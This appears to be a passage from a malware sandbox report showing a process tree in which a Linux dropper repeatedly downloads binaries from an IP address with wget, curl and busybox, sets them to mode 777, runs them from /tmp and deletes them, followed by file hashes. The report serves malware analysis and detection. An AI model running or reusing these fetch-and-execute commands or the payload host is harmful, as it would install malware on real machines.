/tmp/37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM1./37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵
- Executes dropped EXE
PID:1642
-
-
/bin/rmrm 37WWsPY56wpTyjx9JVU51yjzxNIhJAwGM12⤵PID:1643
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1644
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Writes file to tmp directory
PID:1645
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1646
-
-
/bin/chmodchmod 777 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- File and Directory Permissions Modification
PID:1647
-
-
/tmp/6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ2./6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵
- Executes dropped EXE
PID:1648
-
-
/bin/rmrm 6XRch6L6VwItFCL9uZYuK3llj3k5gKgnZ22⤵PID:1649
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1650
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Writes file to tmp directory
PID:1651
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1652
-
-
/bin/chmodchmod 777 asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- File and Directory Permissions Modification
PID:1653
-
-
/tmp/asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh75./asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵
- Executes dropped EXE
PID:1654
-
-
/bin/rmrm asJVL2NuH6mlSXZWCCeCUW2wYyWWqJsh752⤵PID:1655
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1656
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Writes file to tmp directory
PID:1657
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1658
-
-
/bin/chmodchmod 777 CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- File and Directory Permissions Modification
PID:1659
-
-
/tmp/CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD./CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵
- Executes dropped EXE
PID:1660
-
-
/bin/rmrm CdGHDEKqoMjPLAXmd6qgntWvZTGQXwAZhD2⤵PID:1661
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1662
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Writes file to tmp directory
PID:1663
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1664
-
-
/bin/chmodchmod 777 c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- File and Directory Permissions Modification
PID:1665
-
-
/tmp/c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ./c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵
- Executes dropped EXE
PID:1666
-
-
/bin/rmrm c3YZE1qFS44gwlVRPP1Q4vwfOidimWKSPZ2⤵PID:1667
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1668
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Writes file to tmp directory
PID:1669
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1670
-
-
/bin/chmodchmod 777 dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- File and Directory Permissions Modification
PID:1671
-
-
/tmp/dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR./dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵
- Executes dropped EXE
PID:1672
-
-
/bin/rmrm dXgpzCjtcgs7WMcsSVhXKPOcWw0EZvZVOR2⤵PID:1673
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97